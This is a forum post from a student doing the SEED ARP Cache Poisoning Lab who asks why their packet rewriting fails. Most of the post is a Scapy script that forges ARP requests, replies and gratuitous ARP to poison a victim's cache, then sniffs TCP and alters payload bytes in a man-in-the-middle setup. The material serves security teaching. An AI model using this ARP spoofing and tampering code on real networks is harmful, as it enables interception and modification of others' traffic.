Attempting SEED ARP Cache Poisoning Lab, can't get letters to change
I'm attempting th ARP Cache Poisoning Lab, I can get the first couple of tasks but when it comes to the spoof_pkt part I am having some trouble. The goal is to get the letter 'B' to come out as 'A'. However every attempt I make to spoof the packet doesn't work and it never comes out as 'A' even though I can see the packet being sniffed.
I used the replace function for the bytes being passed in pkt. Not sure why it isn't working. Any ideas?
from scapy.all import *

#!/usr/bin/python3

VM_A_IP = '10.9.0.5'
VM_B_IP = '10.9.0.6'
VM_A_MAC = '02:42:0a:09:00:05'
VM_B_MAC = '02:42:0a:09:00:06'

def log_message(message):
    print("[*]", message)

def send_arp_request():
    E = Ether(dst=VM_A_MAC, src='02:42:0a:09:00:69')
    A = ARP(hwsrc='02:42:0a:09:00:69', psrc='10.9.0.6', hwdst=VM_A_MAC, pdst=VM_A_IP)
    pkt = E / A
    pkt.show()
    sendp(pkt)

def send_arp_reply():
    E = Ether(dst=VM_A_MAC, src='02:42:0a:09:00:69')
    A = ARP(op=2, hwsrc='02:42:0a:09:00:69', psrc='10.9.0.6', hwdst=VM_A_MAC, pdst=VM_A_IP)
    pkt = E / A
    pkt.show()
    sendp(pkt)

def send_grat_arp():
    E = Ether(dst='ff:ff:ff:ff:ff:ff', src='02:42:0a:09:00:69')
    A = ARP(hwsrc='02:42:0a:09:00:69', psrc='10.9.0.6', hwdst='ff:ff:ff:ff:ff:ff', pdst='10.9.0.6')
    pkt = E / A
    pkt.show()
    sendp(pkt)

def spoof_pkt(pkt):
    if IP in pkt and TCP in pkt:
        if pkt[IP].src == VM_A_IP and pkt[IP].dst == VM_B_IP:
            if pkt[TCP].payload:
                
                real = pkt[TCP].payload.load
                
                data = real.replace(b'B', b'A').replace(b'b', b'A')
               
                
                new_ip_pkt = IP(pkt[IP].copy())  
                del new_ip_pkt.chksum  
               
                # Create a new TCP packet from the original
                new_tcp_pkt = TCP(pkt[TCP].copy())  
                del new_tcp_pkt.chksum  
                new_tcp_pkt.payload = data  
               
               
                new_pkt = new_ip_pkt / new_tcp_pkt
               
                
                send(new_pkt, verbose=False)
                print("Data changed from:", str(real), "to:", str(data))

        elif pkt[IP].src == VM_B_IP and pkt[IP].dst == VM_A_IP:
            
            new_pkt = IP(pkt[IP].copy())
            new_pkt = new_pkt / TCP(pkt[TCP].copy())  
            send(new_pkt, verbose=False)

if __name__ == "__main__":
    log_message("Starting ARP attack:")
    send_arp_request()
    send_arp_reply()
    send_grat_arp()
    sniff(iface="eth0", filter="tcp", prn=spoof_pkt)

